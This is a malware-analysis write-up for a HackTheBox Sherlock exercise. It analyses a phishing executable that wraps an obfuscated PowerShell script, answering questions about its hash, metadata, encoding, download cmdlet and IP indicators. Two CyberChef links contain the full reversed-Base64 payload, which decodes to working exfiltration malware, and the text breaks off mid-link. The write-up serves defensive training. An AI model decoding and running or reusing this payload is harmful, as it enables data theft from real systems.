Heartbreaker-Continuum

Heartbreaker-Continuum HackTheBox Malware Analysis Sherlocks Writeup by Thamizhiniyan C S

Sherlock Scenario

Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.

Hack The Box

---

Setting Up the Environment

First download the given file and unzip it. The password for the given file is hacktheblue.

The zip file has a executable file named Superstar_MemberCard.tiff.exe.

---

Task 1

Question

To accurately reference and identify the suspicious binary, please provide its SHA256 hash.

Solution

I used PeStudio to get the SHA256 hash of the given executable. You can download PeStudio from the following link: https://www.winitor.com/download.

Once you opened the given exeuctable in PeStudio by going to File -> Open, you can find the SHA256 hash under the footprints tab of PeStudio.

Answer: 12DAA34111BB54B3DCBAD42305663E44E7E6C3842F015CCCBBE6564D9DFD3EA3

---

Task 2

Question

When was the binary file originally created, according to its metadata (UTC)?

Solution

You can find the creation date of the given executable under the file-header tab of PeStudio.

Make sure that you enter the answer in the following format: YYYY-MM-DD HH:MM:SS.

Answer: 2024-03-13 10:38:06

---

Task 3

Question

Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?

Solution

Usually in a executable / PE file, the code is written under the .text section. You can find the details of the .text section of the given executable under the sections tab of PeStudio.

Answer: 38400

---

Task 4

Question

It appears that the binary may have undergone a file conversion process. Could you determine its original filename?

Solution

You can find the original file name before the conversion process under the resources tab of the PeStudio.

Answer: newILY.ps1

---

Task 5

Question

Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.

Solution

To identify the hexadecimal offset of the obfuscated code I used HxD in my case. You can download HxD from the following link: https://mh-nexus.de/en/hxd/.

You can also get the hexadecimal offset of the obfuscated code from the location column of the newILY.ps1 file under the resources tab of the PeStudio.

Set the number of bytes to show as 4 as shown in the above image to get the exact offset.

Answer: 2C74

---

Task 6

Question

The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?

Solution

I used FLOSS to extract all the strings in the given executable. You can download FLOSS from the following link: https://github.com/mandiant/flare-floss/releases/tag/v3.1.0.

You can also use the Sysinternals strings.exe to do the same: https://learn.microsoft.com/en-us/sysinternals/downloads/strings

From the output of floss you can find the obfuscated code as shown in the following image.

The code is obfuscated using the Base64 algorithm and after obfuscation the code is reversed. I used to CyberChef to reverse the above code and decoded the Base64 algorithm to the get the actual code.

CyberChef

You can use the following link to see the output in the above image in realtime.

https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=PT1nQ05VMll5OW1SdEFTWnpKWGRqVm1VdEFpY3BSRWRsZG1jaFJISmdnR2RoQlZMZzBXWjBsVUxsWjNidFZtVUswUVpqSjNiRzFDSWxObmMxTldaUzFDSW9SWFlRUjNZaEpIZDRWMGRrQUNhMEZHVXRBU2JsUlhTdFVtZHYxV1pTcFFESzBRZkswUUtvUW1ibE5sTHRWR2RKeFdhaDFHSmdBQ0lnb1FEc3hXZHVSQ0krQVNLb3dHYkJWbWRzOTJjbEpsTHpSbmJsbEdjcE5XWlM1U2JsUlhTc2xXWXRSQ0lnQUNJSzBnQ04wSElnQUNJSzB3UURKRWJ2cGpPZFZHYzVSRmR1Vldhd2wyWWxKRmJwRldUczlrTHI5MmJzUlhkUDVDY3ZKWFowNVdTdVUyWXBabVpQNUNkbTkyY3ZKM1lwMTBXZzBESWxCWGVVNUNkdVZXYXdsMllsSjFZakpHSmdBQ0lnQUNJZ0FpQ05raUl6TlhaeVJHWkJCQ2JwRldiRkppTDBOV1kwNTJialJDS2tSV1F1TUhkdVZXYXdsMllsSmxMdFZHZEp4V2FoMUdKZzBESTA1V1pwQlhhalZtVWpObVlrQUNJZ0FDSWdBQ0lLMHdlZ2t5YzBOV1kwNTJialJDSXVsR0kwTldZMDUyYmpSQ0tnZzJZaFZtY3ZaR0lnQUNJSzBnQ05BaU1nMERJMEZXYnk5bVI1UjJiQzVTYmxSWFNzbFdZdFJDSWdBQ0lLMEFic1ZuYmtBaVBna3ladGxHSm9RR1pCNXljMDVXWnRoMlloUkhkQjVTYmxSWFNzbFdZdFJDSWdBQ0lLMFFlazltUXMxR2RvUkNJOUFTZWs5bVFzMUdkSTVTYmxSWFNzbFdZdFJDSWdBQ0lLMGdJdTRTWmpsR2R2NUdJc3gySjE5V2VnUVdaek4zYnlOR0l6SlhabjVXYUdKQ0k5QUNkalZtYWlWM1V1MFdaMGxFYnBGV2JrQUNJZ0FpQ05rQ01vMFdaMGxVWjBGV1p5TmtMcjkyYnNSWGR2UkNJOUFTYmxSWFNzbFdZdFJDSWdBQ0lLMEFhMEZHVWx4V2FHWjNjalJDSW9SWFlRMUNJMk4zUXRRbmN2QlhiSkJTUGdNSGRqRkdkdTkyWWtBQ0lnQWlDTm9RRHU5V2EwRldieTltWnVsVVp3bEhWdjVVTGdnR2RoQlZac2xtUjJOM1lrQUNhMEZHVXRBaWR6TlVMMEozYndoWFJnd0hJOUJDSWdBaUNOTUhjdkpIY2tBU2UwSlhadzltY1ExQ0kwTldacUoyVFRCRkkwTldacUoyVHRjWFpPQkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQWlDTkFDSWdBQ0lnQUNJZ0FDSWdvUUR6TlhaeVJHWkJGRGJwRldiRjV5WGtBU1BnQXlKek5YWnlSR1pCQkNicEZXYkZkQ0lnQUNJZ0FDSWdBQ0lnQWlDTlVXYmg1RWJzVm5SdThGSmcwRElnQUNJZ0F5SmwxV1lPQkNic1ZuUm5BQ0lnQUNJZ0FDSWdBQ0lnb1FEN0JFSTlBeWN3OW1jd1JDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSUswQUlna0NNb1UyY3Z4MlF1OEZKZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnUTNZbHBtWVAxQ2FqRldSeTltUmd3SEl5OUdkalZHY3o1V1MwVjJSdThGSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSThCeWN0VkdkSjVpY2xSR2J2WjBjME5XWTA1MmJqUkNJZ0FDSUswZ0kyTjNZdU1IZGpGR2R1OTJRY0pYYUVSWFpuSlhZMFJpSWcwRElvUlhZUVZHYnBaa2R6TkdKZ0FDSWdvUURna0NNeGdpY2xSR2J2WkVkc1ZYWW1WR1IwVjJSdVUyWWhCM2NsMVdZdVJDSTlBaWNsUkdidlowYzBOV1kwNTJialJDSWdBQ0lLMFFLaWtFVUIxa0lvVTJZaEIzY2wxV1lPUlhaSDV5YXY5R2IwVjNia0FTUGdVMlloQjNjbDFXWXVSQ0lnQUNJSzBnYnZsR2RoTldhc0JIY0I1eWF2OUdiMFYzVGdRM1lscG1ZUDEyYkQxQ0kwTldacUoyVHRjWFpPQlNQZ3MyYnZ4R2QxOUdKZ0FDSWdvUURvUlhZUXQyYnZ4R2QxOUdKZ2dHZGhCVlpzbG1SdEF5Y3pWMll2SkhVdFFuY2hSM1VnQUNJZ29RRDdCU0tvUlhZUXQyYnZ4R2QxOUdKb0FpWnBwUURLMEFRaW9RRCt3V2IwaDJMOG9RRCtrSFp2SjJMOG9RRCtBM0w4NGljbFJYWXNCU1p5VkdhMEJTZHZsSEluNVdhbFYyY2c0MmJnY21icFJuYjE5MlErQUhQSzBnUHc5Q1B1Y21idnhHSXY5R2RnY21icFJYYWhkSEl1RkdhMEJpY2xoR2RoSkhJeVZtYnY5MmNnUVhhZ0lXWXlkR0l2UkhJME5YWmlCeWNuUVhhZzgyY2d3Q2RwQkNaaDlHYnVkM2JrQmliaE5HSTE5V2VnVW1jdlpXWmlCQ2RwMVdhc0JTWnRsR2RnRUdJemRTWnlWR2EwQkNMd1ZISXpSV1lsaEdJNXhHWnVWV2F5WkdJaEJDZHpWblNnNGlQaDlDUGxKWFpvNXpKbGhYWnVZbVpwUm5Ma0pYWURKWFppMVdaTjlsY2hSM2N5VkdjMU4xTHdBRE01b0ROMEVqTDNnVE11WURNeTRDTjA4eUw2QUhkMGgySjlZV1p5aEdJaHhESWx4bVlwTjNjbE4yWWhCQ0w1SkhkdVZHSXk5bVpnUW1jaE5HSXdsR2F6SlhaaTFXWnRCQ2JoUlhhbmxHWmdFR0lrVldadUJDYnNkU2R2bEhJc2tuYzA1V1pnNFdhaGRHSXZSbFB3eGpDTjREY3Z3REl1VTJZdVZXYXVWbWR1OTJZZ0lYZHZsSEl5OW1aZ0FYWXRCU1pvUkhJa1ZHYWpGR2QwRkdJbFozSkpCaUw1UlhhMmwyYzF4Mlk0VkdJazVXWWdrM1loWlhheUJISW05R0kwbG1ZZ0VHSTU5bWF1VkdJdUYyWWdVMmRnVW1jbGgyZGd3aVkxeDJZZ0FYYW9ObmNsSldibDFHSWxSWFkybG1jd0JTWWdRWFlnTVhkdlpuZWxSbWJsSkhJaEJpY3ZaR0lrVjJadUZtY3lGR0lsWjNKSjVEYzhvUUQrQTNMODR5Y3lWM2JvQmljbFJuWmhCQ2MxQkNkbFZXYmc4R2RnTVhkZ0kzYm1CU1oyOUdiZ1EySkpCQ0wwbEdJdlJISXVWR2N2QlNaeWRTZHZsSEltbEdJczgyVWc0U1pzRkdkZ00zY2x4V1p0bEdkZ0VHSXQ5bWNtQlNadVYyWXpCU1lnVTJhcHhHSTA1V1p0OVdiZ2cyWWhWR0luNVdhb05YYXlWR2FqQkNMMzlHYnpCeWNuNVdhb1JISW41V2FyRkdkZ1kyYmdrSGQxRldaaUJTWm9SSEl1bEdJbFpYWnB4V1ppQlNTZ3d5WnVsR2EwbG5jbFpYWmdnMloxOW1jb1JISW9OWGR5QmlibFJuWnZCU1ozQlNaeVZHYTNCQ1pzSjNiM0JTWWc0V1MrQUhQSzBnUHc5Q1B1UVhZb1JISWxkbWJoaDJZZzhHZGdVV2JwUkhJemRDZHBCQ1psUldhalZHWmdVbWRua0VJMFZuWWd3U2VzVkdkaHhHSWwxR0l1VldaaUJ5Y25RWFlvUkZJL0FYWjBOSEkwaFhadUJTWm9SSElsdFdZMEJ5YjBCQ1psUlhZMGwyY2xoR0kwVm5ZZ3dpY2haV1lnMDJieVpHSWw1MmJsMTJiekJ5WnVsbWNwMUdaaEJpYmxWbVlnVW1kblUzYjVCaWJsaDJkZ2NtYnB4V1psWkdJMEZHYTBCeWR2NTJhZ1UzYlpCaUwxOVdlZ2dHZHBkSElsSlhZb05ISXZSSEluNVdhMDVXWTNCaWJsVm1ZZ1VtZG5rRUluNVdhb1JYWnQ5MmNnTTNKbEpYWm9SSElsTlhkaE5XWmlCQ2QxOUdJbjVXYW9OV1lsSkhJdGRTU2c0eWNwaEdkZ1VXWnpCU2R2bEhJdVZHYTNCQ2RoVm1jbkJ5WnVsMmJrQlNaeWRTZHZsSElsQjNiSUJpUHd4REkrQTNMOEFDTDVWR1MrQUhQSzBnUDVSMmJpeGpDTjREWmhWR2F2d2pDTjRUWnNsSGR6OUNQSzBRZmdBQ0lnb1FEN1lXYXlWMmN0TW5iaE5ISXNrbWNpbEdiaE5FSTZrSGJwMVdZbTFDZHU5bVpnQUNJZ29RRDdCU2VrOW1ZZ0FDSWdvUUQrVUdiNVIzYzhvUUQrUVdZbGhHUEswZ1BzMUdkb3hqQ040RGJ0UkhhZ1VFVVpSMVFQUlVJOG9RRGlBRUk5QVNlazltUXMxR2RvUmlDTm9RRGwxV1lPeEdiMVpFSTVSbmNsQjNieUJGWnVGR2M0VlVMZ0VESTBObmNwWlVMZ1EzWWxwbVlQMUNkalZHYmxORkk4QlNaekpYZGpWbVV0QWlJRmhWUnVzMFRQeEVWVjlrSWdJWFoweFdhRzFDSWlVMllwWm1aUEJDZG05MmN2SjNZcDFFWHpWR2JwWkVJdEZtY245bWNReGxPREpDSW9SWFlRMUNJdFZHZEpSR2JwaDJRdFFYWkhCU1BnQUNhMEZHVXI5MmJzUlhkdlJpQ05vUURLMHdkdlJtYnBkMWRsNTBiTzFDSTBsV1lYMUNJaUlDWW9SWFlRTkhKaUFXUDBCWGF5TjJjdklDSTBOWGFNUm5ibDFXZG5KWFF0QUNhMEZHVWxoWFIzUkNJb1JYWVFWR2JwWlVMZ00zY2xOMmJ5QlZMMEpYWTBObENOVTJZeTltUnRBQ2EwRkdVelJDSW9SWFlRVkdicFpVTGdVR2JwWlVMMFYzVGd3SElBSmlDTlFYYTRWbUNOVTJjdngyWUswZ0lnaEdkaEJWWjJsR2FqSlhZa0lDWWdRWGR3cFFEcTBUZWx0R2R6OUdhdEF5TDRNVE11WWpOdWtqTng0U056QTBJdEVEVEgxMmFMWlRhaE1rSjQwa09sTldhMkpYWno5eUw2QUhkbU5ISXVWR2N2cFFEaUFrQ05JQ2Q0Um5MMEJYYXlOMlVsTm1iaDVXWjA1V2FoMUdYb1JYWVFSM1loSkhkNFYwZGtJQ0k5QUNhMEZHVXpSaUNOSVNidk5tTFFOMFV1bDJWY2hHZGhCRmRqRm1jMGhYUjNSaUlnMERJb1JYWVFWR2VGZEhKSzBnQ05VMll5OW1SdEFDYTBGR1UwTldZeVJIZUZkSEpnZ0dkaEJsYnZsR2RoNVdhME5YWkUxQ0lseFdhR0JYYWFkSEpnZ0dkaEJWTGdVbWRwaDJZeUZVTGs1V1l3aFhSSzB3WnVsMmN5RkdVamwyY2hKVVp6VlZMZ1VHYnBaRWNwcDFka0FTWnNsbVIwVjNUdEFDYnlWRmNwcDFka0FTYXlWVkxnSUNkbGQyVmlBQ2R1VjJaQkpYWnpWVkxnUTNjbFZYY2xKbFlsZFZMbHQyYjI1V1NLMGdDTkl5Y3M5MmJVMXlhelZHUnd4V1pJeDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJb1JYWVFSM1loSkhkNFYwZGtvUURpQVhhNjVDVURObGJwZEZYeWxHUjBWMlp5Rkdka0lDSTlBU1pzbG1Sd2xtVzNSaUNOSUNjcHBuTHQ5Mll0SVhZa0ZtYzBaMmJ6OVZac0pXWTBKM2J3MUNjak5uYnBkM0x3OGljME5YYWs5U1pzSldZMEozYncxQ2NqTm5icGQzTHpSM1kxUjJieUIzTGpsR2RoUjNjdjAyYmo1aWNoUldZeVJuWnZObkx6VjNMdm96Y3dSSGRvSkNJOUFDYnlWRmNwcDFka29RREswQUlsTm1jdlpVTGdnR2RoQlZaMmxHYWpKWFlrQUNhMEZHVXU5V2EwRm1icFIzY2xSVUxnSVhhRVJYWm5KWFkwUkNJb1JYWVExQ0lsWlhhb05tY0IxeWN6Vm1jdzEyYkRwUURpQVhhNjVTWnRGbWIwTjNib1JDWHlsR1IwVjJaeUZHZGtJQ0k5QUNhMEZHVWxaWGFvTm1jaFJpQ05jU1oxNVdhMDUyYkRsSGIwNVdac2wyVW5BU1BnVTJZdVZtY2xaV1p5QjFjelZtY245bWNRUmlDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhUWQwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJpY3ZBQ2RzVjNjbEpIY25wUURsTm1jdlpVTGdreUowaEhkdThtWnVsV1p5RkdhVGRDSXlsR1IwVjJaeUZHZGtBQ2EwRkdVdDRXYXZwRUtnZ0dkaEJWWnNsbVJ0QVNac2xtUnRRWGRQQkNmZ1VtY2hoMlVpMTJVdFFYWkhwUURLMFFmZ0FDSWdvUUQ5QkNJZ0FDSWdBQ0lLMFFaakozYkcxQ0lvUlhZUTUyYnBSWFl1bEdkelZHWmtBaWJ2bEdkaDVXYTBOWFpFMUNJbDFXWU94R2IxWmtMZlJDSW9SWFlRMUNJdFZHZEoxU2V3OTJRZ0FDSWdBQ0lnQUNJZ0FDSUswd2Vna0NhMEZHVXU5V2EwRm1icFIzY2xSR0pnVW1idEFTWnRGbVRzeFdkRzV5WGtnQ0ltbEdJZ0FDSWdBQ0lnb1FEZ0FDSWdBQ0lnQWlDTlVXYmg1a0xmUkNJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFSTlBQ2EwRkdVdTlXYTBGbWJwUjNjbFJHSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSWdBQ0lLMEFmZ2NTWjE1V2EwNTJiRGxIYjA1V1pzbDJVbkFpYnZsR2RqRmtjdkpuY0YxQ0lsTm1jdlpVTGdRM2NweEVkNFZHSmdVR1oxeDJZdWxVTGdVMmN5VjNZbEpWTGdJWGFFaDJZeUZXWnpSQ0l0VkdkSlJHYnBoMlF0UVhaSEJTUGd3R2IxNUdKSzBBSWdBQ0lnQUNJZ0FDSWdBQ0lLMGdJME4zYnVvaUlnd2lJblIyYnVvaUlnd2lJd1IyYnVvaUlnd2lJelIyYnVvaUlnd2lJMFIyYnVvaUlnQUNMaVEzY3c1aUtpQUNMaXdXYmw1aUtpQUNMaWMyY3Q1aUtpQUNMaWdIZHZSbUxxSUNJc0lDZTB4R2V1b2lJZ0FDSWdBQ0lnQUNJZ0FDSUswQUlzSUNlMDlHY3VvaUlnd2lJMFoyYnE0aUlnd2lJMk4zWXVvaUlnd2lJbVJHY3VvaUlnd2lJNFJIY3c1aUtpQUNMaVFIY3c1aUtpQUNMaWczY3NobkxxSUNJc0l5Y3NobkxxSUNJc0lDZWo5R1p1b2lJZ3dpSWo5R1p1b2lJZ0FTUGdRM2NweEVkNFZHSkswZ0NOMG5DTlVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdVMll5OW1SdEF5YXY5R2IwVjNUZ1VXYmg1VUxnTTNjbE4yYnlCVkx3OUdkVEJDSWdBaUNOc0hJcFVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdzMmJ2eEdkMTlFSWwxV1lPMUNJek5YWmo5bWNRMUNkbGRFS2dZV2FLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWNsTjNjbE4yYnlCbGNsTlhWbkFpY3BSRWRsZG1jaFJISmdnR2RoQlZMdWwyYktoQ0lvUlhZUVZHYnBaVUxnVUdicFpVTDBWM1Rnd0hJa2wwY3pWMll2SkhVZ3dTWnRGbVR6TlhaajltY1FCQ2RqVm1haTlVTDBOV1pzVjJVZ3dISXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTjBuQ04wSElnQUNJSzBBSWdVMmNzRm1aa0FDSWdBQ0lnQUNJSzB3ZWdnMlkwRjJZZzBISWdBQ0lLMGdjbE5YVjA1V1p5SlhkalJDSXhWV0xnSVhaelZsTHBnaWNsNTJkUFJYWkg1eVhrQUNJZ0FDSWdBQ0lLMHdlZ2tuYzBCQ0lnQWlDTnNISTBOV1pxSjJUdFVtY2xoMlZnd0hJek5YWmo5bWNROWxNejRXYVhCQ2RqVm1haTlVYXRkVkwwVjJSZzBESXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhV0YwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJDYnNWbmJrNGpNZ1VXZHNGbWR2QUNWRmRFSTBOV2RrOW1jUU5YZHlsbVZwUm5iQkJDU1VGRVVnSWpjbFJuYmxOVWUwbG1jMU5XWlR4RmR2OW1jY3hsT0ZOVVFRTlZSTkZrVHZBeVlwMTJkSzBRWmpKM2JHMUNJcGNDZDRSbkx6SlhaelZIYmhOMmJzZENJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFS2dnR2RoQlZac2xtUnRBU1pzbG1SdFFYZFBCQ2ZnUW5iMTkyWWpGa2NsTlhWZkp6TXVsMlZnTTNjaHgyUXRBQ2RqVm1haTlVYXRkVkwwVjJSSzBRWmpKM2JHMUNJcGNDZDRSbkx2Wm1icE5FUm5BaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTHVsMmJLaENJb1JYWVFWR2JwWlVMZ1VHYnBaVUwwVjNUZ3dISXN4V2R1UmlQeUFpVEpGVVRQUmtVRk5WVjZZbmJsUmlPalJHZGxkMmNrOUNJME5YWjB4bWJLMGdDTlUyWXk5bVJ0QVNLblFIZTA1U1p0Rm1ieVYyYzFkQ0l5bEdSMFYyWnlGR2RrQUNhMEZHVXQ0V2F2cEVLZ2dHZGhCVlpzbG1SdEFTWnNsbVJ0UVhkUEJDZmdJWFp6VkZkdVZtY3lWM1lrb1FESzBRZkswQWJzVm5UdFFYZFBCQ2ZnVTJZeTltUnRBaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTGdrbmN2UjNZbEpYYUVCU1p3bEhWdFZHZEoxQ0l0VkdkSjF5ZGw1RUlnQUNJSzB3ZWdrU0t5Vm1icEZHZHU5MlFnVUdjNVJGYTBGR1V0QWljcFJFZGxkbWNoUkhKZ2dHZGhCVkxnZ0dkaEJWTDBOWFpVaENJMDltYnRnQ0ltbG1DTm9RRGlNWFpzbG1SZ01XYXNKV2RReDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJeWxHUjBWMlp5Rkdka29RRGlNbmNsTlhWY3B6UWlBU1BnSVhhRWgyWXlGV1p6UmlDTm9RRG4xV2FrQXljelYyWXZKSFV0UW5jaFIzVUswd1p0bEdKZ1VHYnBaRWQxOVVMZ3dtYzFSQ0lwSlhWdEFDZHpWV2R4Vm1VaVYyVnRVMmF2Wm5iSnBRREswZ0ltWldhMDVDWnlGMlF5Vm1ZdFZXVGZKWFkwTm5jbEJYZFR4MWNrRjJiczUyZHZSRVh5VjJjVlJuYmxKbmMxTkdKY05uY2xOWGRjcHpRaUFTUGdjV2JwUmlDTklpWm1sR2R1UW1jaE5rY2xKV2JsMTBYeUZHZHpKWFp3VjNVdkFETXdrak8wUVRNdWNET3g0aU53SWpMMFF6THZvRGMwUkhhaUFTUGd3bWMxUmlDTlVVVEI1a1VGTlZWNlluYmxSQ0k5QWljbE5YVjA1V1p5SlhkalJpQ05VVVRCNWtVRlJWVlExMFREcGpkdVZHSmcwRElsMVdZdVIzY3ZoR0o&oeol=CRLF

Answer: Base64

---

Task 7

Question

What is the specific cmdlet utilized that was used to initiate file downloads?

Solution

You can find the cmdlet used in the decoded version of the obfuscated code as shown in the following image.

Answer: Invoke-WebRequest

---

Task 8

Question

Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.

Solution

You can filter the IP address and sort them as shown in the following image using CyberChef.

You can use the following link to see the output in the above image in realtime.

https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)Extract_IP_addresses(true,false,false,false,true,true)&input=PT1nQ05VMll5OW1SdEFTWnpKWGRqVm1VdEFpY3BSRWRsZG1jaFJISmdnR2RoQlZMZzBXWjBsVUxsWjNidFZtVUswUVpqSjNiRzFDSWxObmMxTldaUzFDSW9SWFlRUjNZaEpIZDRWMGRrQUNhMEZHVXRBU2JsUlhTdFVtZHYxV1pTcFFESzBRZkswUUtvUW1ibE5sTHRWR2RKeFdhaDFHSmdBQ0lnb1FEc3hXZHVSQ0krQVNLb3dHYkJWbWRzOTJjbEpsTHpSbmJsbEdjcE5XWlM1U2JsUlhTc2xXWXRSQ0lnQUNJSzBnQ04wSElnQUNJSzB3UURKRWJ2cGpPZFZHYzVSRmR1Vldhd2wyWWxKRmJwRldUczlrTHI5MmJzUlhkUDVDY3ZKWFowNVdTdVUyWXBabVpQNUNkbTkyY3ZKM1lwMTBXZzBESWxCWGVVNUNkdVZXYXdsMllsSjFZakpHSmdBQ0lnQUNJZ0FpQ05raUl6TlhaeVJHWkJCQ2JwRldiRkppTDBOV1kwNTJialJDS2tSV1F1TUhkdVZXYXdsMllsSmxMdFZHZEp4V2FoMUdKZzBESTA1V1pwQlhhalZtVWpObVlrQUNJZ0FDSWdBQ0lLMHdlZ2t5YzBOV1kwNTJialJDSXVsR0kwTldZMDUyYmpSQ0tnZzJZaFZtY3ZaR0lnQUNJSzBnQ05BaU1nMERJMEZXYnk5bVI1UjJiQzVTYmxSWFNzbFdZdFJDSWdBQ0lLMEFic1ZuYmtBaVBna3ladGxHSm9RR1pCNXljMDVXWnRoMlloUkhkQjVTYmxSWFNzbFdZdFJDSWdBQ0lLMFFlazltUXMxR2RvUkNJOUFTZWs5bVFzMUdkSTVTYmxSWFNzbFdZdFJDSWdBQ0lLMGdJdTRTWmpsR2R2NUdJc3gySjE5V2VnUVdaek4zYnlOR0l6SlhabjVXYUdKQ0k5QUNkalZtYWlWM1V1MFdaMGxFYnBGV2JrQUNJZ0FpQ05rQ01vMFdaMGxVWjBGV1p5TmtMcjkyYnNSWGR2UkNJOUFTYmxSWFNzbFdZdFJDSWdBQ0lLMEFhMEZHVWx4V2FHWjNjalJDSW9SWFlRMUNJMk4zUXRRbmN2QlhiSkJTUGdNSGRqRkdkdTkyWWtBQ0lnQWlDTm9RRHU5V2EwRldieTltWnVsVVp3bEhWdjVVTGdnR2RoQlZac2xtUjJOM1lrQUNhMEZHVXRBaWR6TlVMMEozYndoWFJnd0hJOUJDSWdBaUNOTUhjdkpIY2tBU2UwSlhadzltY1ExQ0kwTldacUoyVFRCRkkwTldacUoyVHRjWFpPQkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQWlDTkFDSWdBQ0lnQUNJZ0FDSWdvUUR6TlhaeVJHWkJGRGJwRldiRjV5WGtBU1BnQXlKek5YWnlSR1pCQkNicEZXYkZkQ0lnQUNJZ0FDSWdBQ0lnQWlDTlVXYmg1RWJzVm5SdThGSmcwRElnQUNJZ0F5SmwxV1lPQkNic1ZuUm5BQ0lnQUNJZ0FDSWdBQ0lnb1FEN0JFSTlBeWN3OW1jd1JDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSUswQUlna0NNb1UyY3Z4MlF1OEZKZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnUTNZbHBtWVAxQ2FqRldSeTltUmd3SEl5OUdkalZHY3o1V1MwVjJSdThGSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSThCeWN0VkdkSjVpY2xSR2J2WjBjME5XWTA1MmJqUkNJZ0FDSUswZ0kyTjNZdU1IZGpGR2R1OTJRY0pYYUVSWFpuSlhZMFJpSWcwRElvUlhZUVZHYnBaa2R6TkdKZ0FDSWdvUURna0NNeGdpY2xSR2J2WkVkc1ZYWW1WR1IwVjJSdVUyWWhCM2NsMVdZdVJDSTlBaWNsUkdidlowYzBOV1kwNTJialJDSWdBQ0lLMFFLaWtFVUIxa0lvVTJZaEIzY2wxV1lPUlhaSDV5YXY5R2IwVjNia0FTUGdVMlloQjNjbDFXWXVSQ0lnQUNJSzBnYnZsR2RoTldhc0JIY0I1eWF2OUdiMFYzVGdRM1lscG1ZUDEyYkQxQ0kwTldacUoyVHRjWFpPQlNQZ3MyYnZ4R2QxOUdKZ0FDSWdvUURvUlhZUXQyYnZ4R2QxOUdKZ2dHZGhCVlpzbG1SdEF5Y3pWMll2SkhVdFFuY2hSM1VnQUNJZ29RRDdCU0tvUlhZUXQyYnZ4R2QxOUdKb0FpWnBwUURLMEFRaW9RRCt3V2IwaDJMOG9RRCtrSFp2SjJMOG9RRCtBM0w4NGljbFJYWXNCU1p5VkdhMEJTZHZsSEluNVdhbFYyY2c0MmJnY21icFJuYjE5MlErQUhQSzBnUHc5Q1B1Y21idnhHSXY5R2RnY21icFJYYWhkSEl1RkdhMEJpY2xoR2RoSkhJeVZtYnY5MmNnUVhhZ0lXWXlkR0l2UkhJME5YWmlCeWNuUVhhZzgyY2d3Q2RwQkNaaDlHYnVkM2JrQmliaE5HSTE5V2VnVW1jdlpXWmlCQ2RwMVdhc0JTWnRsR2RnRUdJemRTWnlWR2EwQkNMd1ZISXpSV1lsaEdJNXhHWnVWV2F5WkdJaEJDZHpWblNnNGlQaDlDUGxKWFpvNXpKbGhYWnVZbVpwUm5Ma0pYWURKWFppMVdaTjlsY2hSM2N5VkdjMU4xTHdBRE01b0ROMEVqTDNnVE11WURNeTRDTjA4eUw2QUhkMGgySjlZV1p5aEdJaHhESWx4bVlwTjNjbE4yWWhCQ0w1SkhkdVZHSXk5bVpnUW1jaE5HSXdsR2F6SlhaaTFXWnRCQ2JoUlhhbmxHWmdFR0lrVldadUJDYnNkU2R2bEhJc2tuYzA1V1pnNFdhaGRHSXZSbFB3eGpDTjREY3Z3REl1VTJZdVZXYXVWbWR1OTJZZ0lYZHZsSEl5OW1aZ0FYWXRCU1pvUkhJa1ZHYWpGR2QwRkdJbFozSkpCaUw1UlhhMmwyYzF4Mlk0VkdJazVXWWdrM1loWlhheUJISW05R0kwbG1ZZ0VHSTU5bWF1VkdJdUYyWWdVMmRnVW1jbGgyZGd3aVkxeDJZZ0FYYW9ObmNsSldibDFHSWxSWFkybG1jd0JTWWdRWFlnTVhkdlpuZWxSbWJsSkhJaEJpY3ZaR0lrVjJadUZtY3lGR0lsWjNKSjVEYzhvUUQrQTNMODR5Y3lWM2JvQmljbFJuWmhCQ2MxQkNkbFZXYmc4R2RnTVhkZ0kzYm1CU1oyOUdiZ1EySkpCQ0wwbEdJdlJISXVWR2N2QlNaeWRTZHZsSEltbEdJczgyVWc0U1pzRkdkZ00zY2x4V1p0bEdkZ0VHSXQ5bWNtQlNadVYyWXpCU1lnVTJhcHhHSTA1V1p0OVdiZ2cyWWhWR0luNVdhb05YYXlWR2FqQkNMMzlHYnpCeWNuNVdhb1JISW41V2FyRkdkZ1kyYmdrSGQxRldaaU